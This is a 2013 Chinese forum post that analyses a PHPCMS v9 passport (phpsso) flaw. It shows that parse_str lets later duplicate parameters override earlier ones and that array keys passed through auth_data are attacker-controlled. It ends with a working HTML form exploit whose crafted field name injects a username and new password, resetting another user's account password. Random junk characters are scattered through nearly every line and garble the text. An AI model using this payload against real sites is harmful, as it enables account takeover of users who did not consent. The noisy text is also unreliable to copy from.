提到的通行证的代码:8 \8 }+ n t4 [, M+ ?7 Z) g
8 \7 W) q! E4 W4 p: j% o1 x5 h
9 P _1 Y; d/ o$ B6 ?parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
: s. c% C3 _& k' h3 n
, t3 H8 [( L& F% W8 y1 c在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
# W, [: |6 p# |+ d6 t& `5 }$ X
. a% A1 c# G' p& ]! y: q: e我把它留给了你们。
2 J# }0 n, U+ N不知道你们发现了它没有。
* U* I7 v4 ]& D/ F4 J. m+ J) p6 x$ z% w: u7 R8 S+ ]) `
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
& Z. y# T7 Z0 r% z6 l2 H
* b/ w* P: l3 P* T1 f$ _) H7 j所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
5 n; x' t$ f1 p/ l2 w- u3 O ^
) j; V1 V' R- f也就是
- H4 m5 G4 V ~5 m6 {
" c( j0 c# }$ L, e, [username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。1 J& S& r3 ?2 }$ Z
- x9 C4 E: ]( ]) k
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
/ q* B+ }! |' [, Z
8 k) G7 l+ s& J2 n. Y3 D: F* ^
# n+ N% _2 R: h3 @8 t其实我们有这样的机会,看看代码,如下:
9 K2 D! b0 P! P2 {
- \( h# l4 G/ t+ U* @, ^- u- n# e+ n
public function auth_data($data) {, C9 w/ p, c S
$s = $sep = '';4 x: {1 l: E/ Z+ m; L) k5 E, A
foreach($data as $k => $v) {
1 H& f7 d! {9 \; I8 ]! @$ r: L if(is_array($v)) {
! h9 Q3 e1 z( x" B1 r& X/ f $s2 = $sep2 = '';: P U" d; d/ ~5 u
foreach($v as $k2 => $v2) {! D f& r1 A: Y' g; R0 C! N
$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);3 | T1 B" G2 Z/ f: W
$sep2 = '&';
) @( ]5 r5 ~ Q4 u5 } }7 x: M$ t# F6 D6 _- v+ X
$s .= $sep.$s2;, C ]$ y" W. U: w' Y
} else {
! _4 t7 e) X3 _1 P& H1 Q $s .= "$sep$k=".$this->_ps_stripslashes($v);
( i4 k, R4 p: L" x }3 n- ^! A- q& I8 [, d0 s+ J2 y
$sep = '&';
; o. D1 z) S# v2 y }2 O* n. {+ J7 a- z8 a) Q# Z6 J* g
, h" ~5 [4 @% _) z! c6 x; ^( X2 O
$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));& [1 [, O d( z6 I
return $auth_s;
0 [- |! ^; w( J4 }, Z }: h5 Z8 h4 y$ ^1 g5 a, @) `$ N: I6 g
" E* r# b3 N' n
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
/ E1 y( L5 i, H( E O" C" v* W# Y- v0 ^" O
举个例子
8 H! E* Q; B) d6 @. y, B% w& J- o# e/ J
$a[aaa=a&bbb] = 'a';
/ L; s( ^4 e+ n+ B& T% E" X6 l7 t+ V1 A; N
会变成aaa=a&bbb=a2 H# ]4 X6 a6 q( Q1 Y
% X a+ R7 d: q" `6 @3 f, S5 `
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。" b& e; a' R4 e# e/ ~
8 R$ q$ Z. t6 E8 X9 E# _( V0 m+ W8 M这个时候,我们可以再去看一个函数。
, t8 u( f- s, s* ]- C
5 @: A+ m* n; R0 L( Z2 T! q就在这个文件内:
( @! n: T& W, r1 n, x) j1 F/ L2 w7 n' i) F4 ^0 | @6 [' S
. u" U# s" g4 ^4 j4 X H3 p8 B' Bpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {( p5 L; E& ^. b! Q
if($email && !$this->_is_email($email)) {
c) ]' K1 C0 [% z; v: z, W, n8 D return -4;
. K0 ~. S" D5 J% R- U( x, ` }; [" Y U' a% E" c
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
+ ^" H6 o# t4 d4 E' [1 [0 [ }3 h$ W! z# g$ B0 C/ w6 _
5 k: ~$ f4 X7 [7 c o
这是向通行证发了这样一个请求。
8 R# r! c& h5 l. I8 @4 T, P$ V- D* c h. V9 g9 s( \
我们再跟到通信证代码里去看看,就会有所发现。% ~( y" m! W; n' A1 V0 v6 m" S
) e, ]8 _" }2 T+ D5 s- F# h
! n' \) A6 L: H
public function edit() {) V4 R1 {' Y# Q7 `* E2 g- @
//能省就省,太长了不是吗?' p9 y f& c o! G4 q
4 o1 C1 r* e1 k) \% a3 Y o' q
if($this->username) {8 _, ?8 u; P ~( M
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
8 E$ O( Y* z7 |+ @; ?" X3 ? $res = $this->db->update($data, array('username'=>$this->username));0 s( \! o4 ~+ w! b8 v( L% M
} else {! u) z, r/ F: Y/ b0 `6 `6 l
file_put_contents('typeb.txt',print_r($data,1).$this->uid);
/ s; v0 d3 h8 c3 t- `( Y& Z $res = $this->db->update($data, array('uid'=>$this->uid));! f# T: ^4 p2 G/ V8 S) ~3 Q8 }0 c) y9 W
}
* n* U" x+ N4 b4 C- M* ~2 a. M# H7 z8 ~& E2 K! e
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:7 w0 ~. Z) n' S$ |7 n
0 }, X% C) @6 H6 k; x7 xpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
J& q; D) [$ M+ S9 @) q
# [/ D/ z+ a+ U8 |很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。7 T; o3 j7 Y0 e T y8 e2 i
* _- b( C+ x; e$ b我当然找到了:
G4 X7 s5 z* t6 N/ @# S# H# Fphpcms9/phpcms/modules/member/index.php
- S8 E$ X. D* q( h2 n9 q: i, r g: N' d0 R+ b! }$ g4 F; h
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
s* x# F. F& i7 Z' y# k' ]3 s/ h+ T. Q
然后就没有然后了。/ j9 Y8 O+ O1 ~3 N, q: w
) t5 H: H% c2 S<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
. L c6 ^* E0 A X3 Z2 U, h <table width="100%" cellspacing="0" class="table_form">! c& s( S Z) T! n, F- p
<tr>
6 w) |8 T5 N5 Q3 O9 p% S <th width="80">邮箱:</th> " k$ Y* Y. u5 h3 D
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
) M! y) u7 G+ I5 U+ S1 J$ [9 c: R </tr>2 g) `$ T% v7 N+ r
<tr>
4 }, @6 \) P6 `( T0 r2 s <th width="80">原密码:</th>
9 b0 D& C2 H. r <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>! S% F) g6 B/ f0 q# o, e1 ~- i
</tr>, e, N1 M/ I' j& n0 @: x8 R! t
<tr>/ E: e: u# K; P, |4 l+ [
<th>新密码:</th>
9 N" l! {" J% q, h* [5 o <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>( A2 j* l4 n& C6 A( T
</tr>
6 t) I: K4 R3 O. I <th></th>
* n3 @0 ]! z3 f9 B4 K1 k, r <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
7 ] ~+ B: h) s$ a7 M </tr>1 V8 o. ]# {2 O+ s% |. a3 \, F6 T
</table>
! F9 |7 J" L! ^2 H- ^
& O/ I3 g4 W* D* H6 @; Z: P
/ {4 a1 v) x& M; l </form>
+ }, f- n" I# ]2 [, M |
发表于 2013-2-23 14:46:35
收藏
支持
反对